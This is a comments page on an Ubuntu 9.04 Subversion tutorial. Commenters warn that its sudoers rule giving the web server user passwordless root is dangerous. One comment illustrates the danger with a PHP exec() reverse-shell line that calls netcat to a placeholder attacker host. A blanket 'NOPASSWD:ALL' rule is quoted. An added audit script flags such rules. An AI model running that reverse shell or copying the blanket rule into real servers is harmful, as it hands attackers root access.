Comments on Setting Up Subversion W/ WebDav, Post-Commit Hook & Multiple Sites On Jaunty Jackalope (Ubuntu 9.04)
This tutorial was designed for someone setting up their 1st Jaunty Jackalope (Ubuntu 9.04) - Subversion server. When I first started with Subversion, I became very frustrated with the many tutorials that were vague on the key part of what I was installing... Subversion! I included some "ease of use" packages for us Linux newbs :).
7 Comment(s)
Comments
I was just wondering why you've included MySQL and phpMyAdmin in your walkthru for Subversion? Is it because the website you're creating uses MySQL?
If so, fine, but some people won't need those two packages, and it just introduces another attack vector on their system.
All the best, JonTheNiceGuy
Good point Jon,
At the time I was taking notes for this tutorial, the setup I was making needed phpMyAdmin... I just didn't think to remove it. I will edit the tutorial and remove it, but as I stated in the "About this tutorial" this tutorial is based on a LAMP install which includes MySQL.
Mike
Hello. Nice tutorial you have here. I have only one problem related to web server part.
From what I know it's dangerous to let the web server obtain root access. Everywhere says that the web server should have the least access in the system.
I believe it is a major security leak to let the web server grant root and even without password! In this way, a person who has PHP exec() access can gain control and devastate your Linux box.
For example:
<?php exec('sudo nc <attacker_ip> -p <attacker_port> -e /bin/bash '); ?>
grants him a reverse connection to his computer, with your Linux shell, running on root.
And of course this is not what we want.
To avoid the part with the www-sudo, I think you should chmod your repository 6 (= read+write) for the www-data user. This is the easiest solution I'm thinking of right now.
Again, very useful tutorial, but watch out for the web server security.
Dan
P.S.: I think in Ubuntu you should use the command "visudo" instead of actually editing the /etc/sudoers file.
As I stated I am pretty new at this whole thing, this was mostly to help people, like myself, who were struggling with SVN. I am currently reworking the tutorial to use groups, I am also reworking the post-commit to be more secure. For now I added a warning at the start of section 6.
Thanks for the input.
Mike
Why exactly do you want to modify sudoers that way? Firstly, it isn't needed - everything runs fine without giving www-data user full root rights. Secondly, you open up the front door (root access) for any exploit of the HTTPD environment. To prevent this, using an unprivileged user for running HTTPD was originally introduced :)
Cheers,
- Rene
Several problems;
1) Webmin not supported on Ubuntu 9.04
2) Webmin not located in repository mentioned. PGP key invalid - no public key available for webmin.
3) Apache will not run when installed this way. It has a MPM Module missing failure. This is what appears to be a Perl compile error.
Not much reason to continue, the system is broken pretty badly after you fail on those items. RELOAD.
The document might be mislabeled and work on an 8.04 system with old unavailable packages but trying this on a 9.04 system is a WASTE OF TIME.
www-data ALL=(ALL) NOPASSWD:ALL
It does not mean anything if your server is behind a firewall... There are much more convenient ways to give www-data (apache) user to use svn commands >> man sudoers
This howto should not be public as it contains real security issues.
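
The sudoers concern raised in the comments above, as an added example that is not part of the tutorial or of any comment: a shell function that flags rules granting passwordless sudo for all commands, run over two constructed files. The `svnsync` account and the paths in the narrower rule are hypothetical.

```shell
#!/bin/sh
# Added example, not code from the tutorial or its comments.
# audit_sudoers FILE... prints "file:line: user" for every rule that grants
# passwordless sudo for ALL commands, and returns 1 if any such rule exists.
# Simplification: continuation lines and included files are not followed.
audit_sudoers() {
    awk '
        /^[ \t]*(#|$)/ { next }                    # comments and blank lines
        $1 ~ /^Defaults/ || $1 ~ /_Alias$/ { next } # settings, not user rules
        {
            user = $1
            rule = $0
            sub(/^[ \t]*[^ \t]+[ \t]+/, "", rule)  # drop the user field
            gsub(/[ \t]+/, "", rule)               # normalise spacing
            # ALL must be a whole entry in the command list after NOPASSWD:
            if (rule ~ /NOPASSWD:(.*,)?ALL(,|$)/) {
                printf "%s:%d: %s\n", FILENAME, FNR, user
                found = 1
            }
        }
        END { exit found + 0 }
    ' "$@"
}

# Constructed sample input: the rule quoted in the comments above, then a
# narrower rule limited to one command run as a hypothetical "svnsync" user.
demo() {
    tmp=$(mktemp -d) || return 2
    printf '%s\n' '# constructed sample' 'Defaults env_reset' \
        'www-data ALL=(ALL) NOPASSWD:ALL' > "$tmp/weak"
    printf '%s\n' 'Defaults env_reset' \
        'www-data ALL=(svnsync) NOPASSWD: /usr/bin/svn update /var/www/site1' \
        > "$tmp/narrow"
    audit_sudoers "$tmp/weak" "$tmp/narrow"
    rc=$?
    rm -rf "$tmp"
    return "$rc"
}

demo || echo "unrestricted NOPASSWD rule found"
```

A changed sudoers file can be syntax-checked with `visudo -cf <file>` before it is installed.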